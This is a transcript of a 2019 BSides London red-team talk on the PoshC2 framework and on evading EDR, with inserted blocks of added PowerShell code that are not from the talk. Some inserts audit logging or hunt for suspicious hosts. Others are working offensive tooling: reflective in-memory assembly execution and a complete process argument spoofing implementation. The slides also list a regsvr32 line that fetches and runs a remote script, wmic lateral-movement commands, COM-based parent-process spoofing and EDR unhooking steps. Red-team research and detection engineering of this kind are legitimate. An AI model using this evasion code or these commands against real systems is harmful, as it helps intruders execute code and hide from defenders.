
powershell-is-dead-epic-learnings-london


BSidesLondon talk about PowerShell is dead - Epic Learnings!


  1. PowerShell is DEAD - Epic Learnings, June 2019
  2. Contents
     + Introductions: Whoami / Whoarewe
     + What is PowerShell: understand what PowerShell is and its key components; is it DEAD?
     + Evolution of PoshC2: release timeline & changes
     + EDR: history & challenges (offensive); future predictions
  3. @benpturner
     + Managing Principal Security Consultant @ Nettitude
     + Leads the Global Red Team Operation @ Nettitude
     + 8 years as a CREST Team Leader (CHECK Team Leader - Infrastructure)
     + 4 years as a CREST Simulated Attack Specialist (CCSAS - STAR/CBEST)
     Training / Talks
     + Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018)
     + Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017)
     + Trusted Third Parties are NOT Trustworthy (GISEC Dubai 2019) - https://bit.ly/2I9ehIg
     + 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4
     + PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4
     Development Projects
     + Lead developer of PoshC2 - Nettitude's Open Source Command & Control (C2) Framework
     + General day-to-day PowerShell / C# projects & security research
  4. @b4ggio_su
     + Principal Security Consultant @ Nettitude
     + A Red Team Lead in the Global Red Team Operation @ Nettitude
     + 16 years in IT:
       • 4 years as a sysadmin
       • 4 years in a defensive role
       • 8 years in an offensive role
     Training / Talks
     + Advanced Threat Actor Simulation - Red Team Training Course
     + Red Team & Stuff (BSides Mcr 2018 / OWASP Warwick 2019)
  5. @rbmaslen
     + Principal Security Consultant @ Nettitude
     + Red Teamer / Tools developer
     + 20 years in IT:
       • 14 years as a developer (mainly C++, C#, HTML/JS)
       • 6 years in an offensive role
     + CCT / CCSAM / OSCP / OSCE
     Training / Talks
     + Thick Client Destruction (Steelcon 2017)
     + COM and the PowerThIEf (Steelcon 2018)
     Development Projects
     + Contributor to PoshC2 - Nettitude's Open Source Command & Control (C2) Framework
     + PowerThIEf, SharpSocks, C# portscanner & ArpScan
  6. Team Spicy Weasel
     + 1st Place - 2018: labs.nettitude.com/blog/derbycon-2018-ctf-write-up
     + 1st Place - 2017: labs.nettitude.com/blog/derbycon-2017-ctf-write-up
     + 3rd Place - 2016: labs.nettitude.com/blog/derbycon-2016-ctf-write-up
  7. What is PowerShell & is it DEAD?
     1. The Microsoft binary - powershell.exe
     2. The DLL behind the binary - System.Management.Automation.dll
     3. The folder - C:\Windows\System32\WindowsPowerShell\v1.0
     4. The version? Is it PSv2 that is dead, or only v5 and later, which are the versions that brought Transcript Logging, ScriptBlock Logging, Module Logging & AMSI integration?
     https://www.youtube.com/watch?v=IYD_aiQtVaE
  8. Is PowerShell DEAD? Evolution of PoshC2
  9. Evolution of PoshC2, 2016 -> 2019
     2016
     + June - v1.0 First release of PoshC2 (server/implant in PowerShell)
     + Dec - v2.0 released - C# GUI, daisy chaining & portability
     2017
     + Mar - v2.1 removed C# GUI
     + May - PoshC2 Slack channel announced
     + July - PoshC2_Python release
     + Oct - Reflective DLL / shellcode released
     + Nov - v3.0 released with SharpSocks
     2018
     + Feb - Readthedocs documentation released
     + July - v4.0 released with Python implant
     2019
     + Jan - v4.8 Sharp implant
     + Feb - Support for 2003/XP
     + June - SharpSocks integration
  10. PoshC2 - PowerShell Server
  11. Process Listing - Initial Execution
  12. Generic PowerShell Implant
  13. Carbon Black / Tanium / EDR
      1. This is probably the best query in Carbon Black to detect malicious activity: process_name:powershell.exe
      2. Do a search across your estate and see how much this shows up...
  14. Carbon Black / Tanium / EDR
      1. This is probably the best query in Carbon Black to detect malicious activity: modload:system.management.automation.dll and modload:system.management.automation.ni.dll
      2. Filter out powershell.exe, and the other legitimate hosts...
      3. Do a search across your estate and see how much this shows up...
  15. Defensive / Legacy Approach (Reactive)
      + Block powershell.exe on all endpoints
      + Only allow signed PowerShell scripts to be executed
      + Upgrade powershell.exe to v5.0 for greater visibility
      + Enable Constrained Language Mode to restrict language elements
      + Monitor for System.Management.Automation.dll in processes
      + Integrate AMSI with the AV vendor for early signature detection
      + Enable & monitor ScriptBlock Logging for suspicious cmdlets
      + Enable & monitor Transcript Logging for suspicious signatures
      + Enable & monitor Module Logging for signatured modules
      Modern Approach (Proactive)
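An added example, not from the talk and not PoshC2 code: a host-side audit of the visibility controls in the list above. It assumes the settings were pushed by GPO and therefore live under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell, and that it runs elevated so the optional-feature query for the v2 engine works; the warning text is mine.

```powershell
# Added example: audit ScriptBlock/Module/Transcript logging, language mode,
# AMSI presence and the PSv2 downgrade path on the local host.
# Assumes the GPO registry locations below and Windows PowerShell 5.1.
$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PolicyValue {
    param([string]$SubKey, [string]$Name)
    $key = Join-Path $policyRoot $SubKey
    if (-not (Test-Path $key)) { return $null }
    return (Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue).$Name
}

function Get-PowerShellVisibility {
    # amsi.dll is loaded into every v5 host; its absence in this process is a red flag
    $amsi = (Get-Process -Id $PID).Modules | Where-Object { $_.ModuleName -eq 'amsi.dll' }
    # The v2 engine is an optional feature on Windows 8 / 2012 and later (needs elevation to query)
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue
    $v2State = 'unknown (not elevated or DISM module missing)'
    if ($v2) { $v2State = ($v2.State -eq 'Enabled') }

    [pscustomobject]@{
        EngineVersion        = $PSVersionTable.PSVersion.ToString()
        ScriptBlockLogging   = (Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging        = (Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -eq 1
        Transcription        = (Get-PolicyValue 'Transcription' 'EnableTranscripting') -eq 1
        TranscriptDirectory  = Get-PolicyValue 'Transcription' 'OutputDirectory'
        LanguageMode         = $ExecutionContext.SessionState.LanguageMode.ToString()
        AmsiLoadedInThisHost = [bool]$amsi
        V2EngineInstalled    = $v2State
    }
}

$audit = Get-PowerShellVisibility
$audit | Format-List

# Each gap maps to something an attacker leans on later in this deck
if (-not $audit.ScriptBlockLogging) { Write-Warning 'ScriptBlock logging off: no 4104 events carrying de-obfuscated script content' }
if (-not $audit.ModuleLogging)      { Write-Warning 'Module logging off: no 4103 pipeline execution events' }
if (-not $audit.Transcription)      { Write-Warning 'Transcription off: no per-session transcript files' }
if ($audit.V2EngineInstalled -eq $true) { Write-Warning 'v2 engine present: "powershell -Version 2" sidesteps ScriptBlock logging and AMSI' }
if ($audit.LanguageMode -ne 'ConstrainedLanguage') { Write-Warning "Language mode is $($audit.LanguageMode), not ConstrainedLanguage" }
```

Run it as administrator on a sample of endpoints; a host where every value comes back false is exactly the environment in which the "process_name:powershell.exe" query above is the only telemetry you have.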
  16. "Is PowerShell DEAD?"
  17. "NO IT'S NOT"
  18. "APT33 according to FireEye"
  19. Supposedly Used by APT33
      + Suspected attribution: Iran
      + Target sectors: Aerospace, energy
      + Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.
      • https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
      • https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
      • https://www.fireeye.com/current-threats/apt-groups.html#apt33
  20. Introducing C# Implant
  21. PoshC2_Python
  22. PoshC2_Python
  23. C# Implant
  24. C# Implant / Reflection
  25. C# Implant / Reflection
      + loadmodule Seatbelt.exe
      + run-exe Seatbelt.Program Seatbelt all
      + run-exe Seatbelt.Program Seatbelt PowerShellSettings
      + run-dll Seatbelt.Program Seatbelt UserChecks
  26. C# Reflection
      + Find the already-loaded assembly:
          foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
      + run-exe - invoke the assembly's entry point with the supplied arguments:
          loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString();
      + run-dll - invoke a named public static method on a type in the assembly:
          loadedType.Assembly.GetType(qualifiedname).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString();
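An added example, not PoshC2's implementation: the loadmodule / run-exe / run-dll flow above, written in PowerShell instead of the C# implant so it can be run stand-alone. Seatbelt is not available offline, so a throw-away assembly is compiled in memory with Add-Type as a stand-in for the bytes loadmodule would send; the Demo namespace, the Check method and the function names are my own. Assumes Windows PowerShell 5.1 (Add-Type -OutputType ConsoleApplication).

```powershell
# Added example: reflective assembly load + entry point / static method invocation.
# The Demo assembly is constructed here purely so the script runs offline.
$source = @'
using System;
namespace Demo {
    public class Program {
        public static void Main(string[] args) {
            Console.WriteLine("Main called with " + args.Length + " arg(s): " + String.Join(" ", args));
        }
        public static string Check(string[] args) {
            return "Check called with " + String.Join(",", args);
        }
    }
}
'@
$tmp = Join-Path $env:TEMP 'Demo.exe'
Add-Type -TypeDefinition $source -OutputAssembly $tmp -OutputType ConsoleApplication
$bytes = [System.IO.File]::ReadAllBytes($tmp)      # stand-in for what "loadmodule" ships down

# loadmodule: load from a byte array. Nothing is written to disk by the load itself,
# but the CLR still raises an AssemblyLoad ETW event and, on .NET 4.8+, AMSI scans the bytes.
$null = [System.Reflection.Assembly]::Load($bytes)

function Get-LoadedAssembly {
    param([string]$AssemblyName)
    $a = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GetName().Name -eq $AssemblyName }
    if (-not $a) { throw "assembly '$AssemblyName' is not loaded" }
    return $a
}

# run-exe: hand args to Main() and capture its Console output, which is what lets the
# implant return tool output to the C2 server rather than to a console it does not have.
function Invoke-LoadedExe {
    param([string]$AssemblyName, [string[]]$Arguments)
    $a = Get-LoadedAssembly $AssemblyName
    $writer = New-Object System.IO.StringWriter
    $old = [Console]::Out
    [Console]::SetOut($writer)
    try     { $a.EntryPoint.Invoke($null, @(,$Arguments)) | Out-Null }
    finally { [Console]::SetOut($old) }
    return $writer.ToString()
}

# run-dll: same idea, but a named public static method via InvokeMember
function Invoke-LoadedMethod {
    param([string]$AssemblyName, [string]$TypeName, [string]$Method, [string[]]$Arguments)
    $a = Get-LoadedAssembly $AssemblyName
    $flags = [System.Reflection.BindingFlags] 'Public,Static,InvokeMethod'
    return $a.GetType($TypeName).InvokeMember($Method, $flags, $null, $null, @(,$Arguments))
}

Invoke-LoadedExe    -AssemblyName 'Demo' -Arguments @('all')
Invoke-LoadedMethod -AssemblyName 'Demo' -TypeName 'Demo.Program' -Method 'Check' -Arguments @('UserChecks')
```

The OpSec point the next slide raises applies here too: the assembly never touches disk after the load, but it stays resident in the AppDomain, so a memory scanner or an `AppDomain.CurrentDomain.GetAssemblies()` walk from a defender's tooling will list it by name.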
  27. C# Reflection / OpSec Considerations
  28. EDR / Next Gen AV
  29. Example Vendors
  30. Endpoint Detection and Response
  31. Attacker Thoughts
      + Avoidance
      + Trickery
      + Partying with EDR
  32. Avoidance
  33. Avoidance - Carbon Black: Detected, but why? RTFM!
  34. Avoidance - Tanium Signal Definition
      image.path contains 'system.management.automation'
      AND process.path contains NOT 'mscorsvw.exe'
      AND process.path contains NOT 'monitoringhost.exe'
      AND process.path contains NOT 'powershell.exe'
      AND process.path contains NOT 'powershell_ise.exe'
      AND process.path contains NOT 'sdiagnhost.exe'
      AND process.path contains NOT 'servermanager.exe'
      AND process.path contains NOT 'sqlps.exe'
      AND process.path contains NOT 'wsmprovhost.exe'
      AND process.path contains NOT 'Microsoft Azure AD Sync\Bin\miiserver.exe'
      (Does require process tracing to be enabled in Tanium - quite heavy)
      Warning - it is not doing a hash checksum on the processes or their location, so anything that merely carries one of the excluded names is not caught.
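An added example, not from the talk: the modload query on slide 14 and the Tanium signal above re-expressed as a host-side PowerShell hunt, with the check the slide says the signal lacks. The exclusion names are the ones from the signal; treating "trusted" as "image has a valid Microsoft Authenticode signature" is my assumption, as are the function names.

```powershell
# Added example: find processes that have System.Management.Automation(.ni).dll loaded,
# flag any host not on the exclusion list, and flag excluded names whose image is not
# Microsoft signed (a renamed or dropped binary called powershell.exe fails here).
$excludedHosts = @(
    'mscorsvw.exe', 'monitoringhost.exe', 'powershell.exe', 'powershell_ise.exe',
    'sdiagnhost.exe', 'servermanager.exe', 'sqlps.exe', 'wsmprovhost.exe', 'miiserver.exe'
)

function Test-MicrosoftSigned {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path $Path)) { return $false }
    $sig = Get-AuthenticodeSignature -FilePath $Path
    return ($sig.Status -eq 'Valid') -and ($sig.SignerCertificate.Subject -like 'CN=Microsoft *')
}

function Find-AutomationDllHosts {
    foreach ($p in Get-Process) {
        # .Modules throws for protected processes and on 32/64-bit mismatch; skip those
        try { $mods = $p.Modules } catch { continue }
        $sma = $mods | Where-Object { $_.ModuleName -match '^System\.Management\.Automation(\.ni)?\.dll$' }
        if (-not $sma) { continue }

        $name = ($p.ProcessName + '.exe').ToLower()
        $reason = $null
        if ($excludedHosts -notcontains $name) {
            $reason = 'unexpected host for System.Management.Automation'
        } elseif (-not (Test-MicrosoftSigned $p.Path)) {
            $reason = 'excluded name, but image is not Microsoft signed'
        }
        if (-not $reason) { continue }

        # Parent and command line are what you will want when triaging the hit
        $wmi = Get-CimInstance Win32_Process -Filter "ProcessId = $($p.Id)"
        [pscustomobject]@{
            Pid         = $p.Id
            Name        = $name
            Path        = $p.Path
            ParentPid   = $wmi.ParentProcessId
            CommandLine = $wmi.CommandLine
            Reason      = $reason
        }
    }
}

Find-AutomationDllHosts | Format-Table -AutoSize -Wrap
```

This only closes the "same name, different binary" hole; a genuine, Microsoft-signed powershell.exe copied into a user-writable folder still passes, so a path allowlist per excluded host is the next refinement if you keep this running.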
  35. Trickery
  36. Parent PID Spoofing
      https://stackoverflow.com/questions/10554913/how-to-call-createprocess-with-startupinfoex-from-c-sharp-and-re-parent-the-ch
  37. Parent PID Spoofing / Carbon Black
  38. Detecting Parent Spoofing
      https://www.countercept.com/blog/detecting-parent-pid-spoofing/
  39. Process Argument Spoofing
  40. Process Argument Spoofing
      1. Create the process suspended, with fake arguments
      2. Identify the PEB using NtQueryInformationProcess (ProcessBasicInformation)
      3. Parse the PEB for RTL_USER_PROCESS_PARAMETERS and its CommandLine UNICODE_STRING
      4. Overwrite the command line buffer using WriteProcessMemory, with the real arguments
      5. Resume the process
  41. Process Argument Spoofing
      + https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing
      + https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
      + https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
  42. Process Argument Spoofing - WHY?
      Execution
      + PowerShell one-liner
      + regsvr32.exe /s /i:http://URL/file.sct scrobj.dll
      + wmic os get /FORMAT:"evil.xsl"
      Lateral Movement
      + sc \\COMPUTERNAME stop "SERVICENAME"
      + wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%SystemRoot%\Temp\batchfile.bat"
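An added example, not from the talk and not PoshC2's or SwampThing's implementation: the five steps on slide 40 done from PowerShell through Add-Type P/Invoke. It assumes x64 Windows with a 64-bit child (the PEB and RTL_USER_PROCESS_PARAMETERS offsets are the x64 ones), that the real command line is no longer than the decoy (it is written over the decoy's own buffer), and the cmd.exe decoy / real command pair at the bottom is constructed for the demonstration.

```powershell
# Added example: create suspended with a decoy command line, rewrite the PEB command
# line buffer with the real one, then resume. Offsets are for x64 processes.
$pinvoke = @'
using System;
using System.Runtime.InteropServices;
public class Spoof {
    [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct STARTUPINFO {
        public uint cb; public string lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError; }
    [StructLayout(LayoutKind.Sequential)] public struct PROCESS_BASIC_INFORMATION {
        public IntPtr ExitStatus, PebBaseAddress, AffinityMask, BasePriority, UniqueProcessId, InheritedFromUniqueProcessId; }

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcess(string app, string cmd, IntPtr pa, IntPtr ta, bool inherit, uint flags,
        IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(IntPtr h, int cls, ref PROCESS_BASIC_INFORMATION pbi, int len, out int ret);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool ReadProcessMemory(IntPtr h, IntPtr addr, byte[] buf, int len, out IntPtr read);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteProcessMemory(IntPtr h, IntPtr addr, byte[] buf, int len, out IntPtr written);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern uint ResumeThread(IntPtr hThread);
}
'@
Add-Type -TypeDefinition $pinvoke

function Start-ArgSpoofedProcess {
    param([string]$Image, [string]$FakeArgs, [string]$RealArgs)
    if ($RealArgs.Length -gt $FakeArgs.Length) { throw 'real command line must fit inside the decoy buffer' }
    $si = New-Object Spoof+STARTUPINFO
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object Spoof+PROCESS_INFORMATION

    # 1. CREATE_SUSPENDED (0x4) with the decoy; this is the command line creation-time telemetry records
    if (-not [Spoof]::CreateProcess($Image, $FakeArgs, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x4, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
        throw "CreateProcess failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    # 2. ProcessBasicInformation (class 0) gives the PEB address
    $pbi = New-Object Spoof+PROCESS_BASIC_INFORMATION
    $len = 0
    $status = [Spoof]::NtQueryInformationProcess($pi.hProcess, 0, [ref]$pbi, [Runtime.InteropServices.Marshal]::SizeOf($pbi), [ref]$len)
    if ($status -ne 0) { throw "NtQueryInformationProcess: 0x$($status.ToString('x'))" }
    # 3. PEB+0x20 = ProcessParameters; CommandLine UNICODE_STRING sits at +0x70, its Buffer pointer at +0x78
    $ptr = New-Object byte[] 8
    $n = [IntPtr]::Zero
    [void][Spoof]::ReadProcessMemory($pi.hProcess, [IntPtr]::Add($pbi.PebBaseAddress, 0x20), $ptr, 8, [ref]$n)
    $params = [IntPtr][BitConverter]::ToInt64($ptr, 0)
    [void][Spoof]::ReadProcessMemory($pi.hProcess, [IntPtr]::Add($params, 0x78), $ptr, 8, [ref]$n)
    $cmdBuf = [IntPtr][BitConverter]::ToInt64($ptr, 0)
    # 4. overwrite the whole decoy buffer: real args as UTF-16LE, zero padding to the decoy's length
    $bytes = New-Object byte[] ([Text.Encoding]::Unicode.GetByteCount($FakeArgs) + 2)
    [Text.Encoding]::Unicode.GetBytes($RealArgs).CopyTo($bytes, 0)
    if (-not [Spoof]::WriteProcessMemory($pi.hProcess, $cmdBuf, $bytes, $bytes.Length, [ref]$n)) { throw 'WriteProcessMemory failed' }
    # 5. resume; the child's GetCommandLine() reads the buffer we just rewrote
    [void][Spoof]::ResumeThread($pi.hThread)
    return $pi.dwProcessId
}

# Constructed demo: telemetry taken at creation sees the ping, the process runs whoami
$child = Start-ArgSpoofedProcess -Image "$env:SystemRoot\System32\cmd.exe" `
    -FakeArgs 'cmd.exe /c ping -n 1 localhost && echo this is a harmless looking decoy command' `
    -RealArgs 'cmd.exe /c whoami /all > %TEMP%\spoofed.txt'
"spawned PID $child; compare the logged command line with the contents of %TEMP%\spoofed.txt"
```

Two things worth knowing before relying on this: the UNICODE_STRING Length field at +0x70 is left untouched, so anything that reads the PEB after the resume (Process Explorer, an EDR doing a post-execution scan) sees the real arguments; and a process-creation sensor that reads the command line from the kernel rather than user memory is not fooled at all. It is a trick against creation-time logging, not a cloak.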
  43. Partying with EDR
  44. Partying With EDR
      Migration Basics - Win API calls:
      + VirtualAllocEx
      + WriteProcessMemory
      + CreateRemoteThread
      http://deniable.org/misc/inject-all-the-things
      However, there are many ways to do the same thing; quick examples: RtlCreateUserThread, SetWindowsHookEx, NtCreateThreadEx, QueueUserAPC
  45. What is Hooking?
      "In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook." - Wikipedia
  46. EDR Hooking
  47. Before EDR
  48. After EDR
  49. After EDR
  50. Other EDRs
  51. Other EDRs
  52. Bringing Back The Good Times
      + Re-patch memory to remove the JMP the EDR inserted, restoring the original function prologue
      + Update the IAT to point to the correct function
      + Create a stub to carry out the same system calls directly
      + Free a number of API calls and use FreeLibrary to remove the interfering DLLs
      https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
  53. Demo
  54. Demo
  55. "Becoming best mates with COM"
  56. COM Intro - just watch this: https://vimeo.com/214856542
  57. Migrating with COM into IE
      + Spoke about this at Steelcon last year; it has proved really handy
      + Has been used to get past some EDRs
      + Breaks the attribution between processes
  58. The key to this? Junction folders
      + Junction folders, a technique leaked in the Vault 7 dumps
      + Forms the basis of SandboxEscaper's recent IE 11 sandbox escape
      + After adding some registry keys, allows code to be executed when you navigate to a folder
  59. Junction folders
  60. Loading the DLL in IE - first set up the registry
  61. How can we use that
      + If we can get a reference to an IE window we can call Navigate2 on it
      + URL needs to be in the format shell:::{<GUID>}
      + https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/aa752094(v%3Dvs.85)
  62. ShellWindows
      + Great COM class that allows you to enumerate all the currently open IE & Explorer windows and automate them
      + Guess what - you can then get them to navigate to a new location
      + https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx
  63. Loading the DLL in IE, PowerShell
      # ShellWindows CLSID; $shwin[0] is the first open IE / Explorer window
      $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
      $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
      $shwin = [System.Activator]::CreateInstance($typeShwin)
      $shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
      <# The CLSID must be in the format "shell:::{CLSID}".
         The second parameter, 2048, is the BrowserNavConstants value for navOpenInNewTab:
         https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
         Further ideas on what payloads you may be able to use follow. #>
  64. Weaponisable? Yes, in VBA
  65. Can you do this in VBA? Yes, of course
  66. Can you do this in VBA? Yes, of course
  67. COM Callable Wrapper
      + Only native DLLs? Thankfully not
      + Using CCWs (COM Callable Wrappers) we can write a .NET DLL and configure the registry keys so that, when the folder is navigated to, the .NET DLL is launched. Use this as a COM hijack if you want.
      + No time to go into CCWs in depth, but have a read of https://docs.microsoft.com/en-us/dotnet/framework/interop/com-callable-wrapper
      + .NET is started in IE and loads the DLL
      + We need a .NET assembly with a class that implements an interface, and some registry keys
  68. COM Callable Wrapper - Class Interface
  69. Native DLLs only?
  70. Getting the reg keys
  71. Setting up the .NET registry keys
  72. Setting up the .NET registry keys
      + Just make sure that you create or import the keys from an x64 application, or use the explicit 64-bit key from the link below
      + https://docs.microsoft.com/en-us/windows/desktop/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
  73. Also guess what the IE shortcut now does?
  74. One last thing - remember this script
      $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
      $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
      $shwin = [System.Activator]::CreateInstance($typeShwin)
      $shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
      <# The CLSID must be in the format "shell:::{CLSID}".
         The second parameter, 2048, is the BrowserNavConstants value for navOpenInNewTab:
         https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
         Further ideas on what payloads you may be able to use follow. #>
  75. Let's tweak it
      $shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
      $typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
      $shwin = [System.Activator]::CreateInstance($typeShwin)
      # Navigating an Explorer window to an executable launches it, so explorer.exe becomes the parent
      $shwin[0].Navigate("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
  76. Running it (must have at least one Explorer window open)
  77. Look who the parent is?
  78. EDR Summary
      + EDR is not a silver bullet
      + Does give incredible visibility to the Blue Team
      + Highly recommended as a complementary piece of the defensive strategy, but should not be solely relied on
      + Does not replace good people with experience
      + Constant cat and mouse game
  79. Future Predictions
      1. Over-reliance on EDR, especially on user endpoints and not server land or non-Windows systems
      2. Customers focusing all attention on tertiary endpoints and not on critical functions or sensitive customer data
      3. Move to zero-trust networks and MFA everywhere
      4. Machine learning - investment into process & procedures
      5. C2 frameworks moving to C++ base code - could see MSF be revived for red teaming
      6. All standard AV/EDR vendors adopting in-memory scanning / AMSI
      7. Windows 7 is EOL January 2020 - not a prediction but a reality
      8. Windows 10 removal of .NET v2 - not a prediction but a reality
      9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
  80. Future Predictions
      1. Over-reliance on EDR, especially on endpoints and not server land (or Unix, really)
      2. C2 frameworks moving to C++ base code - could see MSF be revived for RT
      3. We already have this level of capability and it's interesting what gets detected and what does not
      4. All standard AV/EDR vendors adopting in-memory scanning
      5. Windows 7 is EOL January 2020 - not a prediction but a massive jump
      6. Windows 10 removal of .NET v2
      7. People going back to single executables running either C++ or C# code to evade LOLBin signatures and
  81. THANK YOU
      Ben Turner @benpturner
      Doug McLeod @b4ggio_su
      Rob Maslen @rbmaslen
      https://www.steelcon.info/training/
      https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning
